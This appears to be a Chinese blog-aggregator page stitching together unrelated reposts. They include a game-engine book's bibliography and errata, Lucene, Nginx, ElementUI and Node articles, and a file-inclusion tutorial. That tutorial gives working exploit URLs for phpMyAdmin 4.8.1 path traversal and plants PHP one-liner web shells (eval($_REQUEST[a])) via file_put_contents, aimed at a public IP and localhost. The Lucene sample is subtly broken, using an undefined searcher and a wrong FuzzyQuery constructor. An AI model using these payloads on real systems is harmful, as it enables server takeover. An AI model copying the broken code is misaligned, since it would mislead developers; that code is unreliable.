617第13章游戏性系统简介 61913.1 剖析游戏世界 61913.2 实现动态元素：游戏对象 62313.3 数据驱动游戏引擎 62613.4 游戏世界编辑器 627第14章运行时游戏性基础系统 63714.1 游戏性基础系统的组件 63714.2 各种运行时对象模型架构 64014.3 世界组块的数据格式 65714.4 游戏世界的加载和串流 66314.5 对象引用与世界查询 67014.6 实时更新游戏对象 67614.7 事件与消息泵 69014.8 脚本 70714.9 高层次的游戏流程 726第五部分总结 727第15章还有更多内容吗 72915.1 一些未谈及的引擎系统 72915.2 游戏性系统 730参考文献 733中文索引 737英文索引 755 参考文献 Tomas Akenine-Moller, Eric Haines, and Naty Hoffman. Real-Time Rendering (3rd Edition). Wellesley, MA: A K Peters, 2008. 中译本：《实时计算机图形学（第2版）》，普建涛译，北京大学出版社，2004. Andrei Alexandrescu. Modern C++ Design: Generic Programming and Design Patterns Applied. Resding, MA: Addison-Wesley, 2001. 中译本：《C++设计新思维：泛型编程与设计模式之应用》，侯捷/於春景译，华中科技大学出版社，2003. Grenville Armitage, Mark Claypool and Philip Branch. Networking and Online Games: Understanding and Engineering Multiplayer Internet Games. New York, NY: John Wiley and Sons, 2006. James Arvo (editor). Graphics Gems II. San Diego, CA: Academic Press, 1991. Grady Booch, Robert A. Maksimchuk, Michael W. Engel, Bobbi J. Young, Jim Conallen, and Kelli A. Houston. Object-Oriented Analysis and Design with Applications (3rd Edition). Reading, MA: Addison-Wesley, 2007. 中译本：《面向对象分析与设计（第3版）》，王海鹏/潘加宇译，电子工业出版社，2012. Mark DeLoura (editor). Game Programming Gems. Hingham, MA: Charles River Media, 2000. 中译本：《游戏编程精粹 1》，王淑礼译，人民邮电出版社，2004. Mark DeLoura (editor). Game Programming Gems 2. Hingham, MA: Charles River Media, 2001. 中译本：《游戏编程精粹 2》，袁国忠译，人民邮电出版社，2003. Philip Dutré, Kavita Bala and Philippe Bekaert. Advanced Global Illumination (2nd Edition). Wellesley, MA: A K Peters, 2006. David H. Eberly. 3D Game Engine Design: A Practical Approach to Real-Time Computer Graphics. San Francisco, CA: Morgan Kaufmann, 2001. 国内英文版：《3D游戏引擎设计：实时计算机图形学的应用方法（第2版）》，人民邮电出版社，2009. David H. Eberly. 3D Game Engine Architecture: Engineering Real-Time Applications with Wild Magic. San Francisco, CA: Morgan Kaufmann, 2005. David H. Eberly. Game Physics. San Francisco, CA: Morgan Kaufmann, 2003. Christer Ericson. Real-Time Collision Detection. San Francisco, CA: Morgan Kaufmann, 2005. 中译本：《实时碰撞检测算法技术》，刘天慧译，清华大学出版社，2010. Randima Fernando (editor). GPU Gems: Programming Techniques, Tips and Tricks for Real-Time Graphics. Reading, MA: Addison-Wesley, 2004. 中译本：《GPU精粹：实时图形编程的技术、技巧和技艺》，姚勇译，人民邮电出版社，2006. James D. Foley, Andries van Dam, Steven K. Feiner, and John F. Hughes. Computer Graphics: Principles and Practice in C (2nd Edition). Reading, MA: Addison-Wesley, 1995. 中译本：《计算机图形学原理及实践──C语言描述》，唐泽圣/董士海/李华/吴恩华/汪国平译，机械工业出版社，2004. Grant R. Fowles and George L. Cassiday. Analytical Mechanics (7th Edition). Pacific Grove, CA: Brooks Cole, 2005. John David Funge. AI for Games and Animation: A Cognitive Modeling Approach. Wellesley, MA: A K Peters, 1999. Erich Gamma, Richard Helm, Ralph Johnson, and John M. Vlissiddes. Design Patterns: Elements of Reusable Object-Oriented Software. Reading, MA: Addison-Wesley, 1994. 中译本：《设计模式：可复用面向对象软件的基础》，李英军/马晓星/蔡敏/刘建中译，机械工业出版社，2005. Andrew S. Glassner (editor). Graphics Gems I. San Francisco, CA: Morgan Kaufmann, 1990. Paul S. Heckbert (editor). Graphics Gems IV. San Diego, CA: Academic Press, 1994. Maurice Herlihy, Nir Shavit. The Art of Multiprocessor Programming. San Francisco, CA: Morgan Kaufmann, 2008. 中译本：《多处理器编程的艺术》，金海/胡侃译，机械工业出版社，2009. Roberto Ierusalimschy, Luiz Henrique de Figueiredo and Waldemar Celes. Lua 5.1 Reference Manual. Lua.org, 2006. Roberto Ierusalimschy. Programming in Lua, 2nd Edition. Lua.org, 2006. 中译本：《Lua程序设计（第2版）》，周惟迪译，电子工业出版社，2008. Isaac Victor Kerlow. The Art of 3-D Computer Animation and Imaging (2nd Edition). New York, NY: John Wiley and Sons, 2000. David Kirk (editor). Graphics Gems III. San Francisco, CA: Morgan Kaufmann, 1994. Danny Kodicek. Mathematics and Physics for Game Programmers. Hingham, MA: Charles River Media, 2005. Raph Koster. A Theory of Fun for Game Design. Phoenix, AZ: Paraglyph, 2004. 中译本：《快乐之道：游戏设计的黄金法则》，姜文斌等译，百家出版社，2005. John Lakos. Large-Scale C++ Software Design. Reading, MA: Addison-Wesley, 1995. 中译本：《大规模C++程序设计》，李师贤/明仲/曾新红/刘显明译，中国电力出版社，2003. Eric Lengyel. Mathematics for 3D Game Programming and Computer Graphics (2nd Edition). Hingham, MA: Charles River Media, 2003. Tuoc V. Luong, James S. H. Lok, David J. Taylor and Kevin Driscoll. Internationalization: Developing Software for Global Markets. New York, NY: John Wiley & Sons, 1995. Steve Maguire. Writing Solid Code: Microsoft's Techniques for Developing Bug Free C Programs. Bellevue, WA: Microsoft Press, 1993. 国内英文版：《编程精粹：编写高质量C语言代码》，人民邮电出版社，2009. Scott Meyers. Effective C++: 55 Specific Ways to Improve Your Programs and Designs (3rd Edition). Reading, MA: Addison-Wesley, 2005. 中译本：《Effective C++：改善程序与设计的55个具体做法（第3版）》，侯捷译，电子工业出版社，2011. Scott Meyers. More Effective C++: 35 New Ways to Improve Your Programs and Designs. Reading, MA: Addison-Wesley, 1996. 中译本：《More Effective C++：35个改善编程与设计的有效方法（中文版）》，侯捷译，电子工业出版社，2011. Scott Meyers. Effective STL: 50 Specific Ways to Improve Your Use of the Standard Template Library. Reading, MA: Addison-Wesley, 2001. 中译本：《Effective STL：50条有效使用STL的经验》，潘爱民/陈铭/邹开红译，电子工业出版社，2013. Ian Millington. Game Physics Engine Development. San Francisco, CA: Morgan Kaufmann, 2007. Hubert Nguyen (editor). GPU Gems 3. Reading, MA: Addison-Wesley, 2007. 中译本：《GPU精粹3》，杨柏林/陈根浪/王聪译，清华大学出版社，2010. Alan W. Paeth (editor). Graphics Gems V. San Francisco, CA: Morgan Kaufmann, 1995. C. Michael Pilato, Ben Collins-Sussman, and Brian W. Fitzpatrick. Version Control with Subversion (2nd Edition). Sebastopol , CA: O'Reilly Media, 2008. （常被称作“The Subversion Book”，线上版本.）国内英文版：《使用Subversion进行版本控制》，开明出版社，2009. Matt Pharr (editor). GPU Gems 2: Programming Techniques for High-Performance Graphics and General-Purpose Computation. Reading, MA: Addison-Wesley, 2005. 中译本：《GPU精粹2：高性能图形芯片和通用计算编程技巧》，龚敏敏译，清华大学出版社，2007. Bjarne Stroustrup. The C++ Programming Language, Special Edition (3rd Edition). Reading, MA: Addison-Wesley, 2000. 中译本《C++程序设计语言（特别版）》，裘宗燕译，机械工业出版社，2010. Dante Treglia (editor). Game Programming Gems 3. Hingham, MA: Charles River Media, 2002. 中译本：《游戏编程精粹3》，张磊译，人民邮电出版社，2003. Gino van den Bergen. Collision Detection in Interactive 3D Environments. San Francisco, CA: Morgan Kaufmann, 2003. Alan Watt. 3D Computer Graphics (3rd Edition). Reading, MA: Addison Wesley, 1999. James Whitehead II, Bryan McLemore and Matthew Orlando. World of Warcraft Programming: A Guide and Reference for Creating WoW Addons. New York, NY: John Wiley & Sons, 2008. 中译本：《魔兽世界编程宝典：World of Warcraft Addons完全参考手册》，杨柏林/张卫星/王聪译，清华大学出版社，2010. Richard Williams. The Animator's Survival Kit. London, England: Faber & Faber, 2002. 中译本：《原动画基础教程：动画人的生存手册》，邓晓娥译，中国青年出版社，2006. 勘误第1次印册（2014年2月） P.xviii: 译注中 Wholesale Algoithms -> Wholesale Algorithms P.10: 最后一段第一行微软的媒体播放器 -> 微软的Windows Media Player (多谢读者OpenGPU来函指正) P.15: 1.4.3节第三点按妞 -> 按钮 (多谢读者一个小小凡人来函指正) P.40: 正文最后一行按扭 -> 按钮 P.50: 1.7.8节第二节第一行同是 -> 同时 (多谢读者czfdd来函指正) P.98: 代码 writeExampleStruct(Example& ex, Stream& ex) 中 Stream& ex -> Stream& stream (多谢读者Snow来函指正) P.106: 第一段中有六处 BBS -> BSS，最后一段代码的注释也有同样错误 (多谢读者trout来函指正) P.119: 译注中软体工程 -> 软件工程 (多谢读者Snow来函指正) P.214: 正文第一段有两处虚内存 -> 虚拟内存 (多谢读者Snow来函指正) P.216: 脚注24应标明为译注 (多谢读者Snow来函指正) P.221: 第一段代码的第二个断言应为 ASSERT(link.m_pPrev != NULL); (多谢读者Snow来函指正) P.230: 5.4.4.1节第二段软体 -> 软件 P.286: 脚注4应标明为译注 (多谢读者Snow来函指正) P.322: 第二段按扭事件字 -> 按钮事件 P.349: 9.8节第二段第二行两处部析器 -> 剖析器 (多谢读者Snow来函指正) P.738-572: 双数页页眉参考文献 -> 中文索引 P.755-772: 双数页页眉参考文献 -> 英文索引 P.755: kd tree项应归入K而不是Symbols 以上的错误已于第2次印册中修正。第2次印册及之前 P.11: 第四行细致程度 -> 层次细节 (这是level-of-detail/LOD的内地通译，多谢读者OpenGPU来函指正) P.12: 正文第一段及图1.2标题使命之唤 -> 使命召唤 (多谢读者OpenGPU来函指正) P.12: 正文第一段战栗时空 -> 半条命 (多谢读者OpenGPU来函指正) P.16: 第一点表面下散射 -> 次表面散射 (多谢读者OpenGPU来函指正) P.17: 1.4.4节第五行次文化 -> 亚文化 (此译法在内地更常用。多谢读者OpenGPU来函提示) P.22: 战栗时空 -> 半条命 P.24: 战栗时空2 -> 半条命2 P.34: 1.6.8.2节第一行提呈 -> 提交 (这术语在本书其他地方都写作提交。多谢读者OpenGPU来函提示) P.35: 第七行提呈 -> 提交 (这术语在本书其他地方都写作提交。多谢读者OpenGPU来函提示) P.50: 战栗时空2 -> 半条命2 P.365: 第四段第二行: 细致程度 -> 层次细节 P.441: 10.4.3.2节第三行细致程度 -> 层次细节 P.494: sinusiod -> sinusoid (多谢读者OpenGPU来函指正) P.511: 11.10.4节第一行谈入 -> 淡入 (多谢读者Snow来函指正) P.541: 战栗时空2 -> 半条命2 P.627: 战栗时空2 -> 半条命2 P.654: 第二行建康值 -> 血量 (原来是改正错别字，但译者发现应改作前后统一使用的“血量”。多谢读者Snow来函指正) P.692: 第二行内部分式 -> 内部方式 (多谢读者Snow来函指正) P.696: 14.7.6节第四行不设实际 -> 不切实际 (多谢读者Snow来函指正) 以上的错误已于第3次印册中修正。其他意见 P.220: 正文第一段 m_root.m_pElement 和 P.218 第一段代码中的 m_pElem 不统一。原文有此问题，但因为它们是不同的struct，暂不列作错误。 (多谢读者Snow来函提示) P.331: 8.5.8节第二段中 “反覆”较常见的写法为“反复”，但前者也是正确的，暂不列作错误。 (多谢读者Snow来函提示) P.390: 10.1.3.3节静态光照第二段中“取而代之，我们会使用一张光照纹理贴到所有受光源影响范围内的物体上。这样做能令动态物体经过光源时得到正确的光照。” 后面的一句与前句好像难以一起理解。译者认为，作者应该是指，使用同一静态光源去为静态物件生成光照纹理，以及用于动态对象的光照，能使两者的效果维持一致性。译者会考虑对译文作出改善或加入译注解译。（多谢读者店残来函查询） P.689: 第五行并行处理世代 -> 并行处理时代是对era较准确的翻译。 (多谢读者Snow来函提示) 本篇文章为转载内容。原文链接：https://blog.csdn.net/mypongo/article/details/38388381。该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

2023-02-12 23:04:05

327

转载

Apache Lucene

Apache Lucene索引与搜索：Java中避免NullPointerException策略

近期，随着大数据和人工智能技术的迅猛发展，搜索技术也在不断演进。在这样的背景下，Apache Lucene作为一款成熟的全文搜索引擎库，其应用范围越来越广泛。与此同时，Java社区也不断推出新版本，带来了诸多改进和新特性，使得开发者能够更高效地使用Lucene和避免常见的编程陷阱。最近的一项研究显示，企业在构建搜索功能时，往往面临着性能瓶颈和用户体验问题。而Lucene凭借其强大的索引能力和灵活的搜索选项，成为了许多企业的首选解决方案。然而，随着数据量的激增，如何优化索引和查询性能成为了一个亟待解决的问题。例如，Netflix在其博客中分享了如何利用Lucene和Elasticsearch构建高效搜索系统的经验，特别强调了索引合并和缓存机制的重要性。同时，Java 17的发布也为开发者提供了新的工具和改进，如更强的类型推断和更好的性能优化。这些新特性使得处理NullPointerException等常见异常变得更加容易，从而提升了代码的质量和稳定性。根据Oracle官方文档，Java 17引入了若干新特性，包括密封类（Sealed Classes）、记录类型（Record Patterns）等，这些都可以帮助开发者更安全地编写代码。此外，对于那些正在寻找更强大、更易于扩展的搜索解决方案的企业而言，基于Lucene的分布式搜索系统，如Solr和Elasticsearch，正变得越来越受欢迎。这些系统不仅提供了高度的可伸缩性和容错性，还能通过集群管理工具轻松地进行部署和维护。例如，Elasticsearch的官方文档中详细介绍了如何使用Kubernetes进行部署，这为企业提供了更为便捷的解决方案。综上所述，无论是通过优化现有技术还是采用新兴工具，企业都能够更好地应对大数据时代的挑战，提供更快、更准确的搜索服务。而对于开发者而言，掌握最新的编程语言特性和搜索技术，将有助于他们在竞争激烈的市场中脱颖而出。

2024-10-16 15:36:29

岁月静好

Apache Lucene

Lucene实战：精确到模糊——编辑距离驱动的全文搜索优化与查询性能提升

一、引言在这个信息爆炸的时代，搜索引擎的性能和灵活性成为了用户体验的关键因素之一。Apache Lucene，作为一款强大的全文搜索库，为我们提供了丰富的查询选项，其中之一就是FuzzyQuery，它允许我们在搜索时处理模糊匹配，即使用户输入的关键词可能不完全精确。今天，我们将深入剖析如何在实际项目中利用FuzzyQuery，让搜索体验更加人性化。二、什么是FuzzyQuery 1. 概念解析 FuzzyQuery是Lucene中用于执行模糊搜索的核心工具，它通过计算查询词与索引中的单词之间的Levenshtein距离（也称编辑距离），找到那些相似度超过预设阈值的文档。你知道吗，编辑距离这玩意儿就像个搞笑的测谎游戏，它比量两个词串之间的亲密度，简单说就是，你要么得添字、减字或者动动手脚换个别字，最少几次才能让这两个词串变成亲兄弟一样挨着。三、FuzzyQuery的使用示例 2. 编码实现以下是一个简单的Java代码片段，展示了如何使用FuzzyQuery进行模糊搜索： java import org.apache.lucene.analysis.Analyzer; import org.apache.lucene.document.Document; import org.apache.lucene.document.Field; import org.apache.lucene.document.TextField; import org.apache.lucene.index.DirectoryReader; import org.apache.lucene.index.IndexReader; import org.apache.lucene.index.IndexWriter; import org.apache.lucene.index.IndexWriterConfig; import org.apache.lucene.queryparser.classic.QueryParser; import org.apache.lucene.search.; import org.apache.lucene.store.Directory; import org.apache.lucene.store.RAMDirectory; public class FuzzySearchExample { public static void main(String[] args) throws Exception { Directory indexDir = new RAMDirectory(); // 创建内存索引 Analyzer analyzer = new StandardAnalyzer(); // 使用标准分析器 // 假设我们有一个文档集合，这里只创建一个简单的文档 Document doc = new Document(); doc.add(new TextField("content", "Lucene is awesome", Field.Store.YES)); IndexWriterConfig config = new IndexWriterConfig(analyzer); IndexWriter writer = new IndexWriter(indexDir, config); writer.addDocument(doc); writer.close(); String queryTerm = "Lucenes"; // 用户输入的模糊查询词 float fuzziness = 1f; // 设置模糊度，例如1代表允许一个字符的差异 QueryParser parser = new QueryParser("content", analyzer); FuzzyQuery fuzzyQuery = new FuzzyQuery(parser.parse(queryTerm), fuzziness); IndexReader reader = DirectoryReader.open(indexDir); TopDocs topDocs = searcher.search(fuzzyQuery, 10); // 返回最多10个匹配结果 for (ScoreDoc scoreDoc : topDocs.scoreDocs) { Document hitDoc = searcher.doc(scoreDoc.doc); System.out.println("Score: " + scoreDoc.score + ", Hit: " + hitDoc.get("content")); } reader.close(); } } 这段代码首先创建了一个简单的索引，然后构造了一个FuzzyQuery实例，指定要搜索的关键词和允许的最大编辑距离。搜索时，我们能看到即使用户输入的不是完全匹配的"Lucene"，而是"Lucenes"，FuzzyQuery也能返回相关的结果。四、FuzzyQuery优化策略 3. 性能与优化当处理大量数据时，FuzzyQuery可能会变得较慢，因为它的计算复杂度与搜索词的长度和索引的大小有关。为了提高效率，可以考虑以下策略： - 前缀匹配：使用PrefixQuery结合FuzzyQuery，仅搜索具有相同前缀的文档，这可以减少搜索范围。 - 阈值调整：根据应用需求调整模糊度阈值，更严格的阈值可以提高精确度，但搜索速度会下降。 - 分批处理：如果搜索结果过多，可以分批处理，先缩小范围，再逐步细化。五、结论 4. 未来展望与总结 FuzzyQuery在提高搜索灵活性的同时，也对性能提出了挑战。要想在项目里游刃有余，得深入理解那些神奇的机制和巧妙的策略，这样才能精准又高效，就像个武林高手一样，既能一击即中，又能快如闪电。Lucene那强大的模糊搜索绝不仅仅是纠错能手，它还能在你打字时瞬间给出超贴心的拼写建议，让找东西变得超级简单，简直提升了搜寻乐趣好几倍！随着科技日新月异，Lucene这家伙也越变越聪明，咱们可真盼着瞧见那些超酷的新搜索招数，让找东西这事变得更聪明又快捷，就像点穴一样精准！在构建现代应用程序时，了解并善用这些高级查询工具，无疑会让我们的搜索引擎更具竞争力。希望这个简单示例能帮助你开始在项目中运用FuzzyQuery，提升搜索的精准度和易用性。

2024-06-11 10:54:39

497

时光倒流

Nginx

在Nginx中部署Vue项目时利用URL重写实现避免用户访问旧页面的方法与配置虚拟主机实践

...get或者yum等包管理工具来安装。 sudo apt-get install nginx 2. 安装完Nginx之后，我们需要创建一个新的虚拟主机。可以使用以下命令来创建一个名为“vue-app”的虚拟主机： sudo nano /etc/nginx/sites-available/vue-app 在这个文件中，我们需要配置一些基本的信息，包括虚拟主机的名称、端口号、默认文件、重定向规则等。 3. 创建好虚拟主机之后，我们需要启用它。可以使用以下命令来启用“vue-app”虚拟主机： sudo ln -s /etc/nginx/sites-available/vue-app /etc/nginx/sites-enabled/ 4. 最后，我们需要重启Nginx服务，使得新的配置生效。可以使用以下命令来重启Nginx服务： sudo systemctl restart nginx 四、如何避免用户访问旧页面在上面的步骤中，我们已经创建了一个新的虚拟主机，并且将我们的Vue项目部署到了这个虚拟主机上。那么，我们怎么才能让用户尽快地转向新版本的页面呢？其实，这个问题的答案就在我们的Nginx配置文件中。我们可以使用Nginx的URL重写功能，来将用户访问的旧页面自动重定向到新版本的页面。以下是一段简单的Nginx配置代码，它可以将用户访问的旧页面自动重定向到新版本的页面： server { listen 80; server_name www.example.com; location / { root /var/www/example/; index index.html index.htm; if ($http_user_agent ~ "Trident|MSIE") { rewrite ^(.) https://www.example.com$1 permanent; } } } 在这个代码中，我们首先监听了80端口，然后设置了服务器名。接着，我们指定了项目的根目录和索引文件。最后，我们使用if语句检查用户的浏览器类型。如果用户的浏览器是IE的话，我们就将其重定向到https://www.example.com。五、总结总的来说，通过在Nginx下部署Vue项目，并且使用Nginx的URL重写功能，我们可以很好地避免用户访问旧页面，让他们能够尽快地看到新版本的内容。虽然这事儿可能需要咱们掌握点技术，积累点经验，但只要我们把相关的知识、技巧都学到手，那妥妥地就能搞定它。在未来的工作中，我会继续深入研究Nginx和其他相关技术，以便能够更好地服务于我的客户。我觉得吧，只有不断学习和自我提升，才能真正踩准时代的鼓点，然后设计出更棒的产品、提供更贴心的服务。你看，就像跑步一样，你得不停向前跑，才能不被大部队甩开，对不对？

2023-11-04 10:35:42

124

草原牧歌_t

HTML

个人博客纯html代码

...基本框架，包括设置元数据、创建导航栏、展示博客文章列表以及添加页脚等元素。元数据 , 元数据是关于数据的数据，它提供了有关网页基本信息的描述，如字符集、页面标题等。在HTML文件中，元数据通常位于<head>标签内，例如，<meta charset=UTF-8>定义了网页的字符编码格式，<title>标签则设置了浏览器标签页上显示的网页标题，这些都是构成网页元数据的重要部分。静态网站生成器 , 静态网站生成器是一种工具，它可以将文本文件（如Markdown格式的内容）转换为完整的、功能齐全的静态网页。在Web开发领域，Jekyll、Hugo和Hexo等静态网站生成器常被用来搭建个人博客，它们的优势在于能快速生成SEO友好、加载速度快且易于部署的静态网页，同时支持主题定制和插件扩展，使得非专业开发者也能高效地管理博客内容和样式布局。虽然本文主要介绍了如何使用纯HTML代码创建博客，但提及静态网站生成器是为了提供一个更现代化、高效的博客搭建方案作为后续探索方向。

2023-04-28 09:03:31

417

电脑达人

Element-UI

ElementUI表单管理实战：Vuejs集成、实时存储、数据验证与后台服务优化

...entUI中实现表单数据的实时存储？一、引言在构建现代Web应用时，表单管理是一个不可或缺的部分。Element-UI，作为一套基于Vue.js的高质量UI组件库，提供了丰富的组件来简化表单设计和管理。本文将深入探讨如何在ElementUI中实现表单数据的实时存储，包括数据验证、实时更新以及提交功能。通过具体的代码示例，我们将逐步构建一个简单的表单应用，展示ElementUI的强大能力。二、准备环境首先，确保你的开发环境中已经安装了Node.js和Vue CLI。接下来，创建一个新的Vue项目： bash vue create my-element-form-app cd my-element-form-app 安装Element-UI和axios（用于后端交互）： bash npm install element-ui axios 在main.js中引入并配置Element-UI： javascript import Vue from 'vue' import ElementUI from 'element-ui'; import 'element-ui/lib/theme-chalk/index.css'; import axios from 'axios'; Vue.use(ElementUI); // 配置axios Vue.prototype.$axios = axios; 三、构建表单组件在src/components目录下创建一个名为FormComponent.vue的新文件，用于构建表单： html 提交四、后台服务集成假设你已经有了一个API可以接收表单数据，例如： javascript app.post('/api/submit-form', function(req, res) { const formData = req.body; // 在这里处理表单数据，可能包括数据库操作等 // ... res.send({ status: 'success', message: '表单提交成功' }); }); 五、实时反馈与优化在实际应用中，用户可能会频繁提交表单或修改表单数据。为了让咱们的用户在使用产品时感觉更爽，我们可以加入一些实时反馈的东西，比如加载动画或者进度条啥的，这样他们就能看到自己的操作正在被处理，不会觉得系统卡顿或者慢吞吞的。另外，我们还要优化前端性能，就是说尽量减少那些没必要的请求，让页面加载得更快，操作起来更流畅。这样一来，用户体验绝对能提升一大截！ html 提交六、结语通过上述步骤，我们不仅学会了如何在ElementUI中构建一个具有实时存储功能的表单应用，还了解了如何进行数据验证、错误处理以及优化用户体验。ElementUI，这货简直就是程序员们的超级助手啊！它那简洁高效的风格，就像是魔法一样，让开发者们轻轻松松就能打造出既实用又好看的应用程序。想象一下，你就像个魔法师，只需要几行代码，就能变出一个功能齐全、界面超赞的软件，是不是特别过瘾？ElementUI就是这么给力，让你的创意和想象力，都能在实际项目中大放异彩，不再受限于技术瓶颈。所以，如果你是个爱搞创新、追求极致体验的开发者，ElementUI绝对是你不可多得的好伙伴！哎呀，随着你慢慢摸清了Vue.js这个工具箱里的宝贝，你会发现能做的事儿多了去了！就像是解锁了新技能，可以玩转更复杂的网页设计，打造超级酷炫、功能强大的网站应用。想象一下，你就像个魔法师，手里的魔法棒（Vue.js）越用越熟练，能变出的东西就越来越厉害！是不是感觉整个人都充满了创造的激情？快来试试，让你的创意在网页上绽放吧！

2024-09-29 15:44:20

时光倒流

转载文章

[转载]node重命名文件名_node文件批量重命名

在了解了如何使用Node.js的fs模块进行批量文件重命名之后，我们还可以进一步探索更多与文件系统操作相关的实战应用和技术动态。近期，Node.js 16.x版本对fs模块进行了多项改进和优化，引入了Promise API，使得异步文件操作更加简洁易用。例如，现在可以使用fs.promises.readFile()和fs.promises.writeFile()替代传统的回调方式，提升代码可读性和维护性。另外，针对大型项目或复杂文件系统的管理，一些开源库如"fs-extra"提供了更为丰富的API和更强大的功能支持，比如复制目录、移动文件、删除非空目录等，这些在原生fs模块中可能需要编写更多代码才能实现的功能，在fs-extra中都能轻松调用。同时，对于持续集成（CI/CD）和自动化部署场景，通过结合Node.js的文件操作能力与其他工具（如Git、Webpack等），能够高效完成资源打包、版本控制以及自动化发布流程中的文件处理任务。此外，随着Node.js在服务器端应用场景的拓展，如静态网站生成器（如Hugo、Gatsby）、服务端渲染框架（Next.js）等都深度依赖于文件系统的操作，深入学习和掌握Node.js的文件系统API，将有助于开发者更好地应对实际开发需求，提升工作效率。在安全方面，Node.js文件系统操作也需注意权限管理和异常处理机制，以防止潜在的安全风险，确保数据安全和系统稳定性。因此，理解并遵循最佳实践来执行文件操作是每个Node.js开发者必备技能之一。

2023-12-30 19:15:04

转载

转载文章

[转载]本地文件包含和远程文件包含（超详细，小白也彳亍！）

...表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。为了防止代码重复，我们就有了，文件包含。很多网页如果要用到很多同样的函数，那么我们就可以使用这个文件包含函数，就避免了每个网页又去重复造轮子。在index.php文件里包含1.txt，而1.txt的内容是phpinfo(),include函数包含1.txt，就会把1.txt的内容当成php文件执行，不管后缀是什么。1.txt也好，1.xml也好，只要里面是php代码，然后有被include函数包含，那么就被当成PHP文件执行。如果包含的文件不存在，就会出现致命的错误，并报出绝对路径，然是不影响其他功能的执行，比如这里的nf和123的输出。那么就表明include函数，如果出现错误的话，并不会影响其他功能的运行。如果包含的文件不存在，就会出现致命的错误，并报出绝对路径，影响后面功能的执行，比如这里的nf的输出，后面的功能因为2.txt报错，导致123未执行。那么就表明require函数，如果出现错误的话，会影响后面功能的运行。只要文件内是php代码，文件包含是不在意文件后缀的。 12345.jpg的传参值是a，那么我们可以写传参值=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’) 然后生成一个新的php文件访问index.php 以上我们接触的全部是本地文件包含说了本地文件包含，我们再来看远程文件包含简单来说远程文件包含，就是可以包含其他主机上的文件，并当成php代码执行。要实现远程文件包含的话，php配置的allow_url_include = on必须为on（开启）来我们可以来实验一下，把这个配置打开。 “其他选项菜单”——“打开配置文件”——“php-ini” 打开配置文件，搜索allow_url_include 把Off改为On，注：第一个字母要为大写之后要重启才能生效。配置开启后，我们来远程文件包含一下，我们来远程包含一下kali上的1.txt，可以看到没有本地包含，所以直接显示的内容。那我们现在来远程包含一下kali的这个1.txt，看会不会有phpinfo，注意我这里是index文件哦，所以是默认的。可以看到，包含成功！这里可以插一句题外话，如果是window服务器的话，可以让本地文件包含变成远程文件包含。需要开始XX配置，SMB服务。这里我们可以发现，进入一个不存在的目录，然后再返回上一级，相当于没变目录位置，这个是不影响的，而且这个不存在的目录随便怎么写都可以。但是php是非常严格的，进入一个不存在的目录，这里目录的名字里不能有？号，否则报错，然后再返回上一级，相当于没变目录位置，这个是不影响的，而且这个不存在的目录随便怎么写都可以。实战注意，这里php版本过低，会安装不上安装好后，我们来解析下源码 1.txt内容phpinfo() 来本地文件包含一下，发现成功 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/../11.txt 靶场 http://59.63.200.79:8010/lfi/phpmyadmin/ 先创建一个库名：nf 接着创建表：ff,字段数选2个就行了然后选中我们之前创建好的库名和表名，开始写入数据，第一个就写个一句话木马，第二个随便填充。然后我们找到存放表的路径。这里我们要传参2个，那么就加上&这里我们找到之后传参phpinfo http://59.63.200.79：8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=phpinfo(); 因为a在ff.frm里 <?php eval($_REQUEST[a])?>注意，这里面没有分号和单引号文件包含成功用file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马 http://59.63.200.79：8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a])?>’); <?php eval($_REQUEST[a])?>注意，这里面没有分号和单引号写入成功后，我们连接这个8.php的木马。 http://59.63.200.79：8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/8.php 在线测试时这样，但是我在本地测试的时候，还是有点不一样的。我就直接上不一样的地方，前面的地方都是一样的 1，创建一个库为yingqian1984, 2，创建一个表为yq1984 3，填充表数据,因为跟上面一样，2个字段一个木马，一个随便数据 4，找数据表的位置，最后我发现我的MySQL存放数据库的地方是在 C:\ProgramData\MySQL\MySQL Server 5.7\Data\yingqian1984 文件包含成功。 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=phpinfo(); 用file_put_contents(‘9.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=file_put_contents(‘9.php’,’<?php eval($_REQUEST[a])?>’); <?php eval($_REQUEST[a])?>注意，这里面没有分号和单引号传参成功 http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/9.php?a=phpinfo(); 本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_45300786/article/details/108724251。该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

2024-01-06 09:10:40

343

转载

ElasticSearch

异步采集非业务数据：配置Elasticsearch与Logstash实战

